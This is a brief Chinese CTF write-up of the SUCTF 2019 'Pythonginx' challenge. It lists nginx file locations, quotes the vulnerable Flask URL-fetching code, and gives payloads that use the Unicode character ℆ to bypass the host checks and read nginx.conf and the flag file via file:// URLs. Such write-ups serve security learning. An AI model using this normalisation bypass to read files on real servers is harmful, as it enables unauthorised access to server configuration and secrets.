BUUCTF 24

知识点

  • nginx配置

配置文件存放目录:/etc/nginx
主配置文件:/etc/nginx/conf/nginx.conf
管理脚本:/usr/lib64/systemd/system/nginx.service
模块:/usr/lisb64/nginx/modules
应用程序:/usr/sbin/nginx
程序默认存放位置:/usr/share/nginx/html
日志默认存放位置:/var/log/nginx
配置文件目录为:/usr/local/nginx/conf/nginx.conf

ps: 现在nginx网站配置从nginx.conf转到同目录文件夹下的default.config

 

24-1 [SUCTF 2019]Pythonginx

做题思路

 

审计代码,题目源码如下




    
    
    
    Document


    
URL:
@app.route('/getUrl', methods=['GET', 'POST']) def getUrl(): url = request.args.get("url") host = parse.urlparse(url).hostname if host == 'suctf.cc': return "我扌 your problem? 111" parts = list(urlsplit(url)) host = parts[1] if host == 'suctf.cc': return "我扌 your problem? 222 " + host newhost = [] for h in host.split('.'): newhost.append(h.encode('idna').decode('utf-8')) parts[1] = '.'.join(newhost) #去掉 url 中的空格 finalUrl = urlunsplit(parts).split(' ')[0] host = parse.urlparse(finalUrl).hostname if host == 'suctf.cc': return urllib.request.urlopen(finalUrl).read() else: return "我扌 your problem? 333"

 前两个if判断 host 是否是 suctf.cc ,如果不是才能继续。第三个if要求我们当经过了 decode(‘utf-8’) 之后传进了 urlunsplit 函数后,第三个if读入的要是suctf.cc。
所以我们构造一个payload
由WP得知在nginx中,字符℆ 在后台转码会解析为c/u,我们可以用℆进行绕过

http://177f5649-55d0-4474-9ce5-8cfb44bad757.node3.buuoj.cn/getUrl?url=file://suctf.c%E2%84%86sr/local/nginx/conf/nginx.conf

在这里插入图片描述 找到了flag的位置,那就修改一下payload直接去读取这个文件

file://suctf.c℆sr/fffffflag

BUUCTF 24_第1张图片

你可能感兴趣的:(BUUCTF 24)